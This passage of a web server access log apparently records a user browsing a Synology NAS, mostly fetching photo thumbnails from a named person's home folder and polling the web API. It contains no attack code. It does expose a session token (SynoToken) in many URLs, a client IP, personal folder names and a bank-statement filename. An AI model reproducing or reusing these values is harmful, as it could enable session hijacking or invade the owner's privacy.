"/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FHatar_8_fenykepek%2FIMG_0770.JPG%22&mt=1607075357&size=small" [Client 84.1.26.27] [Length 1515014] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:54 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FHatar_8_fenykepek%2FIMG_0775.JPG%22&mt=1607075408&size=small" [Client 84.1.26.27] [Length 1515014] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:55 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FHatar_8_fenykepek%2FIMG_0755.JPG%22&mt=1607066812&size=small" [Client 84.1.26.27] [Length 4663] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:55 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FHatar_8_fenykepek%2FIMG_0753.JPG%22&mt=1607066802&size=small" [Client 84.1.26.27] [Length 1515014] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:55 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FHatar_8_fenykepek%2FIMG_0769.JPG%22&mt=1607075317&size=small" [Client 84.1.26.27] [Length 1515014] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:55 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FHatar_8_fenykepek%2FIMG_0751.JPG%22&mt=1607066423&size=small" [Client 84.1.26.27] [Length 5107] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:56 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:56 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:56 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FHatar_8_fenykepek%2FIMG_0768.JPG%22&mt=1607075315&size=small" [Client 84.1.26.27] [Length 1515014] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:56 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FHatar_8_fenykepek%2FIMG_0762.JPG%22&mt=1607075218&size=small" [Client 84.1.26.27] [Length 1515014] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:56 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FHatar_8_fenykepek%2FIMG_0756.JPG%22&mt=1607066866&size=small" [Client 84.1.26.27] [Length 1515014] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:56 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FHatar_8_fenykepek%2FIMG_0761.JPG%22&mt=1607066901&size=small" [Client 84.1.26.27] [Length 1515014] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FHatar_8_fenykepek%2FIMG_0765.JPG%22&mt=1607075266&size=small" [Client 84.1.26.27] [Length 1515014] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FHatar_8_fenykepek%2FIMG_0764.JPG%22&mt=1607075251&size=small" [Client 84.1.26.27] [Length 4813] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FHatar_8_fenykepek%2FIMG_0748.JPG%22&mt=1607066398&size=small" [Client 84.1.26.27] [Length 1515014] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FHatar_8_fenykepek%2FIMG_0750.JPG%22&mt=1607066414&size=small" [Client 84.1.26.27] [Length 1515014] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FHatar_8_fenykepek%2FIMG_0757.JPG%22&mt=1607066869&size=small" [Client 84.1.26.27] [Length 1515014] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:58 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FHatar_8_fenykepek%2FIMG_0752.JPG%22&mt=1607066439&size=small" [Client 84.1.26.27] [Length 5213] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:58 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FHatar_8_fenykepek%2FIMG_0754.JPG%22&mt=1607066805&size=small" [Client 84.1.26.27] [Length 4702] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:58 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2Fk%C3%A9pek%2Fombre.jpg%22&mt=1373739273&size=small" [Client 84.1.26.27] [Length 60966] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:58 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FKrisztina%20vegyes%2Fhockey.jpg%22&mt=1481536572&size=small" [Client 84.1.26.27] [Length 14355] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:58 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FHatar_8_fenykepek%2FIMG_0749.JPG%22&mt=1607066403&size=small" [Client 84.1.26.27] [Length 1515014] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:13:58 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhomes%2FKrisztina%2FKrisztina%20vegyes%2Fhockey%20Mom.jpg%22&mt=1425638900&size=small" [Client 84.1.26.27] [Length 54906] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:00 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 2570] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:01 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:01 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:01 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:10 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 579] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:10 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 1236] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:10 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyPhotos/images/icon/folder_photos_256.png" [Client 84.1.26.27] [Length 10431] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:10 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.FileStation.Thumb&method=get&version=2&SynoToken=kcDFKpRQAlHyU&path=%22%2Fhome%2FBizony%C3%ADtv%C3%A1nyok%2FBankszamla_reszlet.png%22&mt=1697141167&size=small" [Client 84.1.26.27] [Length 13687] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:11 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:11 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:13 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 2570] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:16 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:16 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 545] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:20 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:21 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:21 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:26 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:26 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:31 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:31 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:31 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:36 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:36 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:41 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:41 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:44 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:46 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:46 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 545] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:50 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:51 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:51 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:56 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:14:56 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:01 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:01 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:01 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:03 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 81] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 5880] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:07 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/FileBrowser/images/1x/files_ext_256/exe.png?v=42962-s9" [Client 84.1.26.27] [Length 2618] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:07 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/FileBrowser/images/1x/files_ext_256/iso.png?v=42962-s9" [Client 84.1.26.27] [Length 14989] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:07 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/FileBrowser/images/1x/files_ext_256/recycle_bin.png?v=42962-s9" [Client 84.1.26.27] [Length 4138] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:08 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 81] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:11 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 